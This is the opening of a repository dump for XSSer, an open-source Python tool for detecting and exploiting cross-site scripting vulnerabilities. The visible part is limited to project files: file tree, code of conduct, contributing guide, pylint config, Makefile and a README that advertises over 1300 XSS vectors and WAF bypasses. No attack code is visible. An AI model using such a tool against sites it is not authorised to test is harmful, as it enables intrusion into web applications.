├── .gitattributes ├── .github ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md └── ISSUE_TEMPLATE │ ├── bug_report.md │ └── feature_request.md ├── .gitignore ├── .pylintrc ├── Makefile ├── README.md ├── core ├── __init__.py ├── crawler.py ├── curlcontrol.py ├── dork.py ├── driver │ └── geckodriver ├── encdec.py ├── flashxss.py ├── fuzzing │ ├── DCP.py │ ├── DOM.py │ ├── HTTPsr.py │ ├── __init__.py │ ├── dorks.txt │ ├── heuristic.py │ ├── user-agents.txt │ └── vectors.py ├── globalmap.py ├── gtkcontroller.py ├── imagexss.py ├── main.py ├── mozchecker.py ├── options.py ├── post │ ├── __init__.py │ └── xml_exporter.py ├── randomip.py ├── reporter.py ├── threadpool.py ├── tokenhub.py ├── twsupport.py └── update.py ├── doc ├── AUTHOR ├── CHANGELOG ├── COMMITMENT ├── COPYING ├── INSTALL ├── MANIFESTO ├── README └── requirements.txt ├── gtk ├── docs │ ├── about.txt │ ├── wizard0.txt │ ├── wizard1.txt │ ├── wizard2.txt │ ├── wizard3.txt │ ├── wizard4.txt │ ├── wizard5.txt │ └── wizard6.txt ├── images │ ├── world.png │ ├── xsser.jpg │ ├── xssericon_16x16.png │ ├── xssericon_24x24.png │ └── xssericon_32x32.png ├── map │ └── GeoIP.dat ├── xsser.desktop └── xsser.ui ├── setup.py └── xsser /.gitattributes: -------------------------------------------------------------------------------- 1 | *.conf text eol=lf 2 | *.md text eol=lf 3 | *.md5 text eol=lf 4 | *.py text eol=lf 5 | *.xml text eol=lf 6 | LICENSE text eol=lf 7 | COMMITMENT text eol=lf 8 | 9 | *_ binary 10 | *.dll binary 11 | *.pdf binary 12 | *.so binary 13 | *.wav binary 14 | *.zip binary 15 | *.x32 binary 16 | *.x64 binary 17 | *.exe binary 18 | *.sln binary 19 | *.vcproj binary 20 | 21 | -------------------------------------------------------------------------------- /.github/CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation. 6 | 7 | ## Our Standards 8 | 9 | Examples of behavior that contributes to creating a positive environment include: 10 | 11 | * Using welcoming and inclusive language 12 | * Being respectful of differing viewpoints and experiences 13 | * Gracefully accepting constructive criticism 14 | * Focusing on what is best for the community 15 | * Showing empathy towards other community members 16 | 17 | Examples of unacceptable behavior by participants include: 18 | 19 | * The use of sexualized language or imagery and unwelcome sexual attention or advances 20 | * Trolling, insulting/derogatory comments, and personal or political attacks 21 | * Public or private harassment 22 | * Publishing others' private information, such as a physical or electronic address, without explicit permission 23 | * Other conduct which could reasonably be considered inappropriate in a professional setting 24 | 25 | ## Our Responsibilities 26 | 27 | Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior. 28 | 29 | Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful. 30 | 31 | ## Scope 32 | 33 | This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers. 34 | 35 | ## Enforcement 36 | 37 | Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project leader at epsylon@riseup.net. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately. 38 | 39 | Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership. 40 | 41 | ## Attribution 42 | 43 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version] 44 | 45 | [homepage]: http://contributor-covenant.org 46 | [version]: http://contributor-covenant.org/version/1/4/ 47 | 48 | -------------------------------------------------------------------------------- /.github/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing to XSSer 2 | 3 | ## Reporting bugs 4 | 5 | Please report all bugs on the [issue tracker](https://github.com/epsylon/xsser/issues). 6 | 7 | ### Guidelines 8 | 9 | * Before you submit a bug report, search both [open](https://github.com/epsylon/xsser/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/epsylon/xsser/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. 10 | 11 | * Make sure you can reproduce the bug with the latest development version of xsser. 12 | 13 | * Your report should give detailed instructions on how to reproduce the problem. If xsser raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal. 14 | 15 | * If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?* 16 | 17 | ## Submitting code changes 18 | 19 | All code contributions are greatly appreciated. 20 | 21 | Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests). 22 | 23 | ### Guidelines 24 | 25 | In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions: 26 | 27 | * Each patch should make one logical change. 28 | * Avoid tabbing, use four blank spaces instead. 29 | * Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:epsylon@riseup.net). 30 | * Do not change style on numerous files in one single pull request, we can [discuss](mailto:epsylon@riseup.net) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected. 31 | * Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests. 32 | * Style that is too different from main branch will be ''adapted'' by the developers side. 33 | 34 | ### Licensing 35 | 36 | By submitting code contributions to the xsser developers or via Git pull request, checking them into the xsser source code repository, it is understood (unless you specify otherwise) that you are offering the xsser copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them. 37 | 38 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: '' 5 | labels: bug report 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | 1. Run '...' 15 | 2. See error 16 | 17 | **Expected behavior** 18 | A clear and concise description of what you expected to happen. 19 | 20 | **Screenshots** 21 | If applicable, add screenshots to help explain your problem. 22 | 23 | **Running environment:** 24 | - XSSer version [e.g. 1.8.2] 25 | - Installation method [e.g. git] 26 | - Operating system: [e.g. Debian 4.19.16-1~bpo9+1 (2019-02-07) ] 27 | - Python version [e.g. 3.7] 28 | 29 | **Target details:** 30 | - XSS techniques found by xsser [e.g. DOM-Based XSS] 31 | - WAF/IPS [if any] 32 | - Relevant console output [if any] 33 | - Exception traceback [if any] 34 | 35 | **Additional context** 36 | Add any other context about the problem here. 37 | 38 | --- 39 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: feature request 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | 22 | --- 23 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__/ 2 | *.py[cod] 3 | -------------------------------------------------------------------------------- /.pylintrc: -------------------------------------------------------------------------------- 1 | # Based on Apache 2.0 licensed code from https://github.com/ClusterHQ/flocker 2 | 3 | [MASTER] 4 | 5 | # Specify a configuration file. 6 | #rcfile= 7 | 8 | # Python code to execute, usually for sys.path manipulation such as 9 | # pygtk.require(). 10 | init-hook="from pylint.config import find_pylintrc; import os, sys; sys.path.append(os.path.dirname(find_pylintrc()))" 11 | 12 | # Add files or directories to the blacklist. They should be base names, not 13 | # paths. 14 | ignore= 15 | 16 | # Pickle collected data for later comparisons. 17 | persistent=no 18 | 19 | # List of plugins (as comma separated values of python modules names) to load, 20 | # usually to register additional checkers. 21 | load-plugins= 22 | 23 | # Use multiple processes to speed up Pylint. 24 | # DO NOT CHANGE THIS VALUES >1 HIDE RESULTS!!!!! 25 | jobs=1 26 | 27 | # Allow loading of arbitrary C extensions. Extensions are imported into the 28 | # active Python interpreter and may run arbitrary code. 29 | unsafe-load-any-extension=no 30 | 31 | # A comma-separated list of package or module names from where C extensions may 32 | # be loaded. Extensions are loading into the active Python interpreter and may 33 | # run arbitrary code 34 | extension-pkg-whitelist= 35 | 36 | # Allow optimization of some AST trees. This will activate a peephole AST 37 | # optimizer, which will apply various small optimizations. For instance, it can 38 | # be used to obtain the result of joining multiple strings with the addition 39 | # operator. Joining a lot of strings can lead to a maximum recursion error in 40 | # Pylint and this flag can prevent that. It has one side effect, the resulting 41 | # AST will be different than the one from reality. 42 | optimize-ast=no 43 | 44 | 45 | [MESSAGES CONTROL] 46 | 47 | # Only show warnings with the listed confidence levels. Leave empty to show 48 | # all. Valid levels: HIGH, INFERENCE, INFERENCE_FAILURE, UNDEFINED 49 | confidence= 50 | 51 | # Enable the message, report, category or checker with the given id(s). You can 52 | # either give multiple identifier separated by comma (,) or put this option 53 | # multiple time. See also the "--disable" option for examples. 54 | disable=all 55 | 56 | enable=import-error, 57 | import-self, 58 | reimported, 59 | wildcard-import, 60 | misplaced-future, 61 | deprecated-module, 62 | unpacking-non-sequence, 63 | invalid-all-object, 64 | undefined-all-variable, 65 | used-before-assignment, 66 | cell-var-from-loop, 67 | global-variable-undefined, 68 | redefine-in-handler, 69 | unused-import, 70 | unused-wildcard-import, 71 | global-variable-not-assigned, 72 | undefined-loop-variable, 73 | global-at-module-level, 74 | bad-open-mode, 75 | redundant-unittest-assert, 76 | boolean-datetime 77 | deprecated-method, 78 | anomalous-unicode-escape-in-string, 79 | anomalous-backslash-in-string, 80 | not-in-loop, 81 | continue-in-finally, 82 | abstract-class-instantiated, 83 | star-needs-assignment-target, 84 | duplicate-argument-name, 85 | return-in-init, 86 | too-many-star-expressions, 87 | nonlocal-and-global, 88 | return-outside-function, 89 | return-arg-in-generator, 90 | invalid-star-assignment-target, 91 | bad-reversed-sequence, 92 | nonexistent-operator, 93 | yield-outside-function, 94 | init-is-generator, 95 | nonlocal-without-binding, 96 | lost-exception, 97 | assert-on-tuple, 98 | dangerous-default-value, 99 | duplicate-key, 100 | useless-else-on-loop 101 | expression-not-assigned, 102 | confusing-with-statement, 103 | unnecessary-lambda, 104 | pointless-statement, 105 | pointless-string-statement, 106 | unnecessary-pass, 107 | unreachable, 108 | using-constant-test, 109 | bad-super-call, 110 | missing-super-argument, 111 | slots-on-old-class, 112 | super-on-old-class, 113 | property-on-old-class, 114 | not-an-iterable, 115 | not-a-mapping, 116 | format-needs-mapping, 117 | truncated-format-string, 118 | missing-format-string-key, 119 | mixed-format-string, 120 | too-few-format-args, 121 | bad-str-strip-call, 122 | too-many-format-args, 123 | bad-format-character, 124 | format-combined-specification, 125 | bad-format-string-key, 126 | bad-format-string, 127 | missing-format-attribute, 128 | missing-format-argument-key, 129 | unused-format-string-argument 130 | unused-format-string-key, 131 | invalid-format-index, 132 | bad-indentation, 133 | mixed-indentation, 134 | unnecessary-semicolon, 135 | lowercase-l-suffix, 136 | invalid-encoded-data, 137 | unpacking-in-except, 138 | import-star-module-level, 139 | long-suffix, 140 | old-octal-literal, 141 | old-ne-operator, 142 | backtick, 143 | old-raise-syntax, 144 | metaclass-assignment, 145 | next-method-called, 146 | dict-iter-method, 147 | dict-view-method, 148 | indexing-exception, 149 | raising-string, 150 | using-cmp-argument, 151 | cmp-method, 152 | coerce-method, 153 | delslice-method, 154 | getslice-method, 155 | hex-method, 156 | nonzero-method, 157 | t-method, 158 | setslice-method, 159 | old-division, 160 | logging-format-truncated, 161 | logging-too-few-args, 162 | logging-too-many-args, 163 | logging-unsupported-format, 164 | logging-format-interpolation, 165 | invalid-unary-operand-type, 166 | unsupported-binary-operation, 167 | not-callable, 168 | redundant-keyword-arg, 169 | assignment-from-no-return, 170 | assignment-from-none, 171 | not-context-manager, 172 | repeated-keyword, 173 | missing-kwoa, 174 | no-value-for-parameter, 175 | invalid-sequence-index, 176 | invalid-slice-index, 177 | unexpected-keyword-arg, 178 | unsupported-membership-test, 179 | unsubscriptable-object, 180 | access-member-before-definition, 181 | method-hidden, 182 | assigning-non-slot, 183 | duplicate-bases, 184 | inconsistent-mro, 185 | inherit-non-class, 186 | invalid-slots, 187 | invalid-slots-object, 188 | no-method-argument, 189 | no-self-argument, 190 | unexpected-special-method-signature, 191 | non-iterator-returned, 192 | arguments-differ, 193 | signature-differs, 194 | bad-staticmethod-argument, 195 | non-parent-init-called, 196 | bad-except-order, 197 | catching-non-exception, 198 | bad-exception-context, 199 | notimplemented-raised, 200 | raising-bad-type, 201 | raising-non-exception, 202 | misplaced-bare-raise, 203 | duplicate-except, 204 | nonstandard-exception, 205 | binary-op-exception, 206 | not-async-context-manager, 207 | yield-inside-async-function 208 | 209 | # Needs investigation: 210 | # abstract-method (might be indicating a bug? probably not though) 211 | # protected-access (requires some refactoring) 212 | # attribute-defined-outside-init (requires some refactoring) 213 | # super-init-not-called (requires some cleanup) 214 | 215 | # Things we'd like to enable someday: 216 | # redefined-builtin (requires a bunch of work to clean up our code first) 217 | # redefined-outer-name (requires a bunch of work to clean up our code first) 218 | # undefined-variable (re-enable when pylint fixes https://github.com/PyCQA/pylint/issues/760) 219 | # no-name-in-module (giving us spurious warnings https://github.com/PyCQA/pylint/issues/73) 220 | # unused-argument (need to clean up or code a lot, e.g. prefix unused_?) 221 | # function-redefined (@overload causes lots of spurious warnings) 222 | # too-many-function-args (@overload causes spurious warnings... I think) 223 | # parameter-unpacking (needed for eventual Python 3 compat) 224 | # print-statement (needed for eventual Python 3 compat) 225 | # filter-builtin-not-iterating (Python 3) 226 | # map-builtin-not-iterating (Python 3) 227 | # range-builtin-not-iterating (Python 3) 228 | # zip-builtin-not-iterating (Python 3) 229 | # many others relevant to Python 3 230 | # unused-variable (a little work to cleanup, is all) 231 | 232 | # ... 233 | [REPORTS] 234 | 235 | # Set the output format. Available formats are text, parseable, colorized, msvs 236 | # (visual studio) and html. You can also give a reporter class, eg 237 | # mypackage.mymodule.MyReporterClass. 238 | output-format=parseable 239 | 240 | # Put messages in a separate file for each module / package specified on the 241 | # command line instead of printing them on stdout. Reports (if any) will be 242 | # written in a file name "pylint_global.[txt|html]". 243 | files-output=no 244 | 245 | # Tells whether to display a full report or only the messages 246 | reports=no 247 | 248 | # Python expression which should return a note less than 10 (10 is the highest 249 | # note). You have access to the variables errors warning, statement which 250 | # respectively contain the number of errors / warnings messages and the total 251 | # number of statements analyzed. This is used by the global evaluation report 252 | # (RP0004). 253 | evaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10) 254 | 255 | # Template used to display messages. This is a python new-style format string 256 | # used to format the message information. See doc for all details 257 | #msg-template= 258 | 259 | 260 | [LOGGING] 261 | 262 | # Logging modules to check that the string format arguments are in logging 263 | # function parameter format 264 | logging-modules=logging 265 | 266 | 267 | [FORMAT] 268 | 269 | # Maximum number of characters on a single line. 270 | max-line-length=100 271 | 272 | # Regexp for a line that is allowed to be longer than the limit. 273 | ignore-long-lines=^\s*(# )??$ 274 | 275 | # Allow the body of an if to be on the same line as the test if there is no 276 | # else. 277 | single-line-if-stmt=no 278 | 279 | # List of optional constructs for which whitespace checking is disabled. `dict- 280 | # separator` is used to allow tabulation in dicts, etc.: {1 : 1,\n222: 2}. 281 | # `trailing-comma` allows a space between comma and closing bracket: (a, ). 282 | # `empty-line` allows space-only lines. 283 | no-space-check=trailing-comma,dict-separator 284 | 285 | # Maximum number of lines in a module 286 | max-module-lines=1000 287 | 288 | # String used as indentation unit. This is usually " " (4 spaces) or "\t" (1 289 | # tab). 290 | indent-string=' ' 291 | 292 | # Number of spaces of indent required inside a hanging or continued line. 293 | indent-after-paren=4 294 | 295 | # Expected format of line ending, e.g. empty (any line ending), LF or CRLF. 296 | expected-line-ending-format= 297 | 298 | 299 | [TYPECHECK] 300 | 301 | # Tells whether missing members accessed in mixin class should be ignored. A 302 | # mixin class is detected if its name ends with "mixin" (case insensitive). 303 | ignore-mixin-members=yes 304 | 305 | # List of module names for which member attributes should not be checked 306 | # (useful for modules/projects where namespaces are manipulated during runtime 307 | # and thus existing member attributes cannot be deduced by static analysis. It 308 | # supports qualified module names, as well as Unix pattern matching. 309 | ignored-modules=thirdparty.six.moves 310 | 311 | # List of classes names for which member attributes should not be checked 312 | # (useful for classes with attributes dynamically set). This supports can work 313 | # with qualified names. 314 | ignored-classes= 315 | 316 | # List of members which are set dynamically and missed by pylint inference 317 | # system, and so shouldn't trigger E1101 when accessed. Python regular 318 | # expressions are accepted. 319 | generated-members= 320 | 321 | 322 | [VARIABLES] 323 | 324 | # Tells whether we should check for unused import in __init__ files. 325 | init-import=no 326 | 327 | # A regular expression matching the name of dummy variables (i.e. expectedly 328 | # not used). 329 | dummy-variables-rgx=_$|dummy 330 | 331 | # List of additional names supposed to be defined in builtins. Remember that 332 | # you should avoid to define new builtins when possible. 333 | additional-builtins= 334 | 335 | # List of strings which can identify a callback function by name. A callback 336 | # name must start or end with one of those strings. 337 | callbacks=cb_,_cb 338 | 339 | 340 | [SIMILARITIES] 341 | 342 | # Minimum lines number of a similarity. 343 | min-similarity-lines=4 344 | 345 | # Ignore comments when computing similarities. 346 | ignore-comments=yes 347 | 348 | # Ignore docstrings when computing similarities. 349 | ignore-docstrings=yes 350 | 351 | # Ignore imports when computing similarities. 352 | ignore-imports=no 353 | 354 | 355 | [SPELLING] 356 | 357 | # Spelling dictionary name. Available dictionaries: none. To make it working 358 | # install python-enchant package. 359 | spelling-dict= 360 | 361 | # List of comma separated words that should not be checked. 362 | spelling-ignore-words= 363 | 364 | # A path to a file that contains private dictionary; one word per line. 365 | spelling-private-dict-file= 366 | 367 | # Tells whether to store unknown words to indicated private dictionary in 368 | # --spelling-private-dict-file option instead of raising a message. 369 | spelling-store-unknown-words=no 370 | 371 | 372 | [MISCELLANEOUS] 373 | 374 | # List of note tags to take in consideration, separated by a comma. 375 | notes=FIXME,XXX,TODO 376 | 377 | 378 | [BASIC] 379 | 380 | # List of builtins function names that should not be used, separated by a comma 381 | bad-functions=map,filter,input 382 | 383 | # Good variable names which should always be accepted, separated by a comma 384 | good-names=i,j,k,ex,Run,_ 385 | 386 | # Bad variable names which should always be refused, separated by a comma 387 | bad-names=foo,bar,baz,toto,tutu,tata 388 | 389 | # Colon-delimited sets of names that determine each other's naming style when 390 | # the name regexes allow several styles. 391 | name-group= 392 | 393 | # Include a hint for the correct naming format with invalid-name 394 | include-naming-hint=no 395 | 396 | # Regular expression matching correct function names 397 | function-rgx=[a-z_][a-z0-9_]{2,30}$ 398 | 399 | # Naming hint for function names 400 | function-name-hint=[a-z_][a-z0-9_]{2,30}$ 401 | 402 | # Regular expression matching correct variable names 403 | variable-rgx=[a-z_][a-z0-9_]{2,30}$ 404 | 405 | # Naming hint for variable names 406 | variable-name-hint=[a-z_][a-z0-9_]{2,30}$ 407 | 408 | # Regular expression matching correct constant names 409 | const-rgx=(([A-Z_][A-Z0-9_]*)|(__.*__))$ 410 | 411 | # Naming hint for constant names 412 | const-name-hint=(([A-Z_][A-Z0-9_]*)|(__.*__))$ 413 | 414 | # Regular expression matching correct attribute names 415 | attr-rgx=[a-z_][a-z0-9_]{2,30}$ 416 | 417 | # Naming hint for attribute names 418 | attr-name-hint=[a-z_][a-z0-9_]{2,30}$ 419 | 420 | # Regular expression matching correct argument names 421 | argument-rgx=[a-z_][a-z0-9_]{2,30}$ 422 | 423 | # Naming hint for argument names 424 | argument-name-hint=[a-z_][a-z0-9_]{2,30}$ 425 | 426 | # Regular expression matching correct class attribute names 427 | class-attribute-rgx=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$ 428 | 429 | # Naming hint for class attribute names 430 | class-attribute-name-hint=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$ 431 | 432 | # Regular expression matching correct inline iteration names 433 | inlinevar-rgx=[A-Za-z_][A-Za-z0-9_]*$ 434 | 435 | # Naming hint for inline iteration names 436 | inlinevar-name-hint=[A-Za-z_][A-Za-z0-9_]*$ 437 | 438 | # Regular expression matching correct class names 439 | class-rgx=[A-Z_][a-zA-Z0-9]+$ 440 | 441 | # Naming hint for class names 442 | class-name-hint=[A-Z_][a-zA-Z0-9]+$ 443 | 444 | # Regular expression matching correct module names 445 | module-rgx=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$ 446 | 447 | # Naming hint for module names 448 | module-name-hint=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$ 449 | 450 | # Regular expression matching correct method names 451 | method-rgx=[a-z_][a-z0-9_]{2,30}$ 452 | 453 | # Naming hint for method names 454 | method-name-hint=[a-z_][a-z0-9_]{2,30}$ 455 | 456 | # Regular expression which should only match function or class names that do 457 | # not require a docstring. 458 | no-docstring-rgx=^_ 459 | 460 | # Minimum line length for functions/classes that require docstrings, shorter 461 | # ones are exempt. 462 | docstring-min-length=-1 463 | 464 | 465 | [ELIF] 466 | 467 | # Maximum number of nested blocks for function / method body 468 | max-nested-blocks=5 469 | 470 | 471 | [IMPORTS] 472 | 473 | # Deprecated modules which should not be used, separated by a comma 474 | deprecated-modules=regsub,TERMIOS,Bastion,rexec 475 | 476 | # Create a graph of every (i.e. internal and external) dependencies in the 477 | # given file (report RP0402 must not be disabled) 478 | import-graph= 479 | 480 | # Create a graph of external dependencies in the given file (report RP0402 must 481 | # not be disabled) 482 | ext-import-graph= 483 | 484 | # Create a graph of internal dependencies in the given file (report RP0402 must 485 | # not be disabled) 486 | int-import-graph= 487 | 488 | 489 | [DESIGN] 490 | 491 | # Maximum number of arguments for function / method 492 | max-args=5 493 | 494 | # Argument names that match this expression will be ignored. Default to name 495 | # with leading underscore 496 | ignored-argument-names=_.* 497 | 498 | # Maximum number of locals for function / method body 499 | max-locals=15 500 | 501 | # Maximum number of return / yield for function / method body 502 | max-returns=6 503 | 504 | # Maximum number of branch for function / method body 505 | max-branches=12 506 | 507 | # Maximum number of statements in function / method body 508 | max-statements=50 509 | 510 | # Maximum number of parents for a class (see R0901). 511 | max-parents=7 512 | 513 | # Maximum number of attributes for a class (see R0902). 514 | max-attributes=7 515 | 516 | # Minimum number of public methods for a class (see R0903). 517 | min-public-methods=2 518 | 519 | # Maximum number of public methods for a class (see R0904). 520 | max-public-methods=20 521 | 522 | # Maximum number of boolean expressions in a if statement 523 | max-bool-expr=5 524 | 525 | 526 | [CLASSES] 527 | 528 | # List of method names used to declare (i.e. assign) instance attributes. 529 | defining-attr-methods=__init__,__new__,setUp 530 | 531 | # List of valid names for the first argument in a class method. 532 | valid-classmethod-first-arg=cls 533 | 534 | # List of valid names for the first argument in a metaclass class method. 535 | valid-metaclass-classmethod-first-arg=mcs 536 | 537 | # List of member names, which should be excluded from the protected access 538 | # warning. 539 | exclude-protected=_asdict,_fields,_replace,_source,_make 540 | 541 | 542 | [EXCEPTIONS] 543 | 544 | # Exceptions that will emit a warning when being caught. Defaults to 545 | # "Exception" 546 | overgeneral-exceptions=Exception 547 | 548 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | # $Id: Makefile,v 1.6 2008/10/29 01:01:35 ghantoos Exp $ 2 | # 3 | PYTHON=`which python` 4 | DESTDIR=/ 5 | BUILDIR=$(CURDIR)/debian/xsser 6 | PROJECT=xsser 7 | VERSION=1.8.4 8 | 9 | all: 10 | @echo "make source - Create source package" 11 | @echo "make install - Install on local system" 12 | @echo "make buildrpm - Generate a rpm package" 13 | @echo "make builddeb - Generate a deb package" 14 | @echo "make clean - Get rid of scratch and byte files" 15 | 16 | source: 17 | $(PYTHON) setup.py sdist $(COMPILE) 18 | 19 | install: 20 | $(PYTHON) setup.py install --root $(DESTDIR) $(COMPILE) 21 | 22 | buildrpm: 23 | $(PYTHON) setup.py bdist_rpm --post-install=rpm/postinstall --pre-uninstall=rpm/preuninstall 24 | 25 | builddeb: 26 | $(PYTHON) setup.py sdist $(COMPILE) --dist-dir=../ 27 | rename -f 's/$(PROJECT)-(.*)\.tar\.gz/$(PROJECT)_$$1\.orig\.tar\.gz/' ../* 28 | dpkg-buildpackage -i -I -rfakeroot 29 | 30 | clean: 31 | $(PYTHON) setup.py clean 32 | $(MAKE) -f $(CURDIR)/debian/rules clean 33 | rm -rf build/ MANIFEST 34 | find . -name '*.pyc' -delete 35 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![XSSer](https://xsser.03c8.net/xsser/thehive1.png "XSSer") 2 | 3 | ---------- 4 | 5 | + Web: https://xsser.03c8.net 6 | 7 | ---------- 8 | 9 | Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications. 10 | 11 | It provides several options to try to bypass certain filters and various special techniques for code injection. 12 | 13 | XSSer has pre-installed [ > 1300 XSS ] attacking vectors and can bypass-exploit code on several browsers/WAFs: 14 | 15 | [PHPIDS]: PHP-IDS 16 | [Imperva]: Imperva Incapsula WAF 17 | [WebKnight]: WebKnight WAF 18 | [F5]: F5 Big IP WAF 19 | [Barracuda]: Barracuda WAF 20 | [ModSec]: Mod-Security 21 | [QuickDF]: QuickDefense 22 | [Sucuri]: SucuriWAF 23 | [Chrome]: Google Chrome 24 | [IE]: Internet Explorer 25 | [FF]: Mozilla's Gecko rendering engine, used by Firefox/Iceweasel 26 | [NS-IE]: Netscape in IE rendering engine mode 27 | [NS-G]: Netscape in the Gecko rendering engine mode 28 | [Opera]: Opera Browser 29 | 30 | ![XSSer](https://xsser.03c8.net/xsser/url_generation.png "XSSer URL Generation Schema") 31 | 32 | ---------- 33 | 34 | #### Installing: 35 | 36 | XSSer runs on many platforms. It requires Python (3.x) and the following libraries: 37 | 38 | - python3-pycurl - Python bindings to libcurl (Python 3) 39 | - python3-bs4 - error-tolerant HTML parser for Python 3 40 | - python3-geoip - Python3 bindings for the GeoIP IP-to-country resolver library 41 | - python3-gi - Python 3 bindings for gobject-introspection libraries 42 | - python3-cairocffi - cffi-based cairo bindings for Python (Python3) 43 | - python3-selenium - Python3 bindings for Selenium 44 | - firefoxdriver - Firefox WebDriver support 45 | 46 | On Debian-based systems (ex: Ubuntu), run: 47 | 48 | sudo apt-get install python3-pycurl python3-bs4 python3-geoip python3-gi python3-cairocffi python3-selenium firefoxdriver 49 | 50 | On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... also run: 51 | 52 | sudo pip3 install pycurl bs4 pygeoip gobject cairocffi selenium 53 | 54 | #### Source libs: 55 | 56 | * Python: https://www.python.org/downloads/ 57 | * PyCurl: http://pycurl.sourceforge.net/ 58 | * PyBeautifulSoup4: https://pypi.org/project/beautifulsoup4/ 59 | * PyGeoIP: https://pypi.org/project/pygeoip/ 60 | * PyGObject: https://pypi.org/project/gobject/ 61 | * PyCairocffi: https://pypi.org/project/cairocffi/ 62 | * PySelenium: https://pypi.org/project/selenium/ 63 | 64 | ---------- 65 | 66 | #### License: 67 | 68 | XSSer is released under the GPLv3. You can find the full license text 69 | in the [LICENSE](./docs/LICENSE) file. 70 | 71 | ---------- 72 | 73 | #### Screenshots: 74 | 75 | ![XSSer](https://xsser.03c8.net/xsser/thehive2.png "XSSer Shell") 76 | 77 | ![XSSer](https://xsser.03c8.net/xsser/thehive3.png "XSSer Manifesto") 78 | 79 | ![XSSer](https://xsser.03c8.net/xsser/thehive4.png "XSSer Configuration") 80 | 81 | ![XSSer](https://xsser.03c8.net/xsser/thehive5.png "XSSer Bypassers") 82 | 83 | ![XSSer](https://xsser.03c8.net/xsser/thehive6.png "XSSer [HTTP GET] [LOCAL] Reverse Exploit") 84 | 85 | ![XSSer](https://xsser.03c8.net/xsser/thehive7.png "XSSer [HTTP POST] [REMOTE] Reverse Exploit") 86 | 87 | ![XSSer](https://xsser.03c8.net/xsser/thehive8.png "XSSer [HTTP DOM] Exploit") 88 | 89 | ![XSSer](https://xsser.03c8.net/xsser/zika4.png "XSSer GeoMap") 90 | 91 | -------------------------------------------------------------------------------- /core/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | This file is part of the XSSer project, https://xsser.03c8.net 3 | 4 | Copyright (c) 2010/2020 | psy 5 | 6 | xsser is free software; you can redistribute it and/or modify it under 7 | the terms of the GNU General Public License as published by the Free 8 | Software Foundation version 3 of the License. 9 | 10 | xsser is distributed in the hope that it will be useful, but WITHOUT ANY 11 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 12 | FOR A PARTICULAR PURPOSE. See the GNU General Public License for more 13 | details. 14 | 15 | You should have received a copy of the GNU General Public License along 16 | with xsser; if not, write to the Free Software Foundation, Inc., 51 17 | Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 18 | """ 19 | -------------------------------------------------------------------------------- /core/crawler.py: -------------------------------------------------------------------------------- 1 | 